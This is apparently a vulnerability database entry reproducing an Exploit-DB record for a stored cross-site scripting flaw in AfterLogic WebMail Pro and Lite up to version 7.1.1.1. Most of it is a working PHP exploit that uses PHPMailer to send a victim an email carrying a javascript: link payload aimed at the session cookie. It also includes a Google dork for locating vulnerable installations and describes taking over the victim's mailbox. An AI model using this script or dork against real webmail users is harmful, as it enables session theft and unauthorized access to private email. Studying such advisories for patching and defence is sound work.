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vendor:
WebMail Pro
by:
Saeed reza Zamanian
8,8
CVSS
HIGH
Stored XSS
79
CWE
Product Name: WebMail Pro
Affected Version From: <= 7.1.1.1
Affected Version To: <= 7.1.1.1
Patch Exists: YES
Related CWE: CVE-6423
CPE: a:afterlogic:webmail_pro
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: KALI Linux 1.0.5 (Debian) Apache/2.2.22
2014

AfterLogic Pro and Lite <= 7.1.1.1 Stored XSS

AfterLogic WebMail is a browser-based e-mail and collaboration front end, designed to work with your existing messaging solutions. XSS codes can be stored in E-Mail Body. So you can send an email to the Victim with below payload and steal the victim's cookie.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

<?php

/*  
# Exploit Title  : AfterLogic Pro and Lite <= 7.1.1.1 Stored XSS
# Google Dork	 : intext:"AfterLogic" intext:"Login Information" inurl:index.php
# Date		 : 19 Jan 2014
# Exploit Author : Saeed reza Zamanian  [s.zamanian [AT] imenantivirus.com]
# Vendor Homepage: http://www.afterlogic.com/
# Software Link  : http://www.afterlogic.com/download/webmail-pro
# Version	 : <= 7.1.1.1
# Tested on	 : KALI Linux 1.0.5 (Debian) Apache/2.2.22 
# CVE 		 : vendor id = 6423

Greetz:  H.Zamanian, K.Kia, K.Khani

WebApp Desciption:
	AfterLogic WebMail is a browser-based e-mail and collaboration front end,
	designed to work with your existing messaging solutions. From an administrator’s
	perspective, the application is easy to install on your own server, easy to integrate and
	easy to maintain.


Vulnerability Description:
	XSS codes can be stored in E-Mail Body.
	So you can send an email to the Victim with below payload and steal the victim's cookie.

	<a href=javaScRipt:alert(document.cookie)>Click Me, Please...</a>\r\n

	 NOTE: javascript html char encode = javaScRipt

	then you will be able to get into the victim's mailbox via the url:
	http://[WebSite]/[AfterLogic]/Default.aspx

## Phpmailer class is included in the exploit so you need to download it here and run the exploit in the phpmailer directory:
	http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list


*/

echo "<title>AfterLogic Pro and Lite <= 7.1.1.1 XSS Exploit</title>";
require_once('class.phpmailer.php');

$mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch
$mail->IsSMTP(); // telling the class to use SMTP


/* SETTINGS */
$smtp_user = "username"; 	// Any valid smtp account
$smtp_pass = "password";	// Your PASSWORD
$smtp_port = "25";		// SMTP PORT Default: 25
$smtp_host = "localhost"; 	// Any valid smtp server
$from = "attacker@email.com";	// Any email
$victim = "victim@email.com";	// Victim email on afterlogic webmail.
$subject = "Salam";		// Subject

/* Body Text */
$body = '<a href=javaScRipt:alert(document.cookie)>Click Me, Please...</a>\r\n';



try {
  $mail->SMTPDebug  = 2;                  // enables SMTP debug information (for testing)
  $mail->SMTPAuth   = false;               // enable SMTP authentication
  $mail->Host       = $smtp_host;
  $mail->Port       = $smtp_port;
  $mail->Username   = $smtp_user; 	 // SMTP account username
  $mail->Password   = $smtp_pass;        // SMTP account password

  $mail->SetFrom($from, 'Attacker');
  $mail->AddReplyTo($from, 'Attacker');

  $mail->AddAddress($victim, 'Victim');
  $mail->Subject = $subject;

  $mail->MsgHTML($body);
  $mail->Send();
  echo "Message Sent OK</p>\n";
} catch (phpmailerException $e) {
  echo $e->errorMessage();
} catch (Exception $e) {
  echo $e->getMessage();
}
?>

</body>
</html>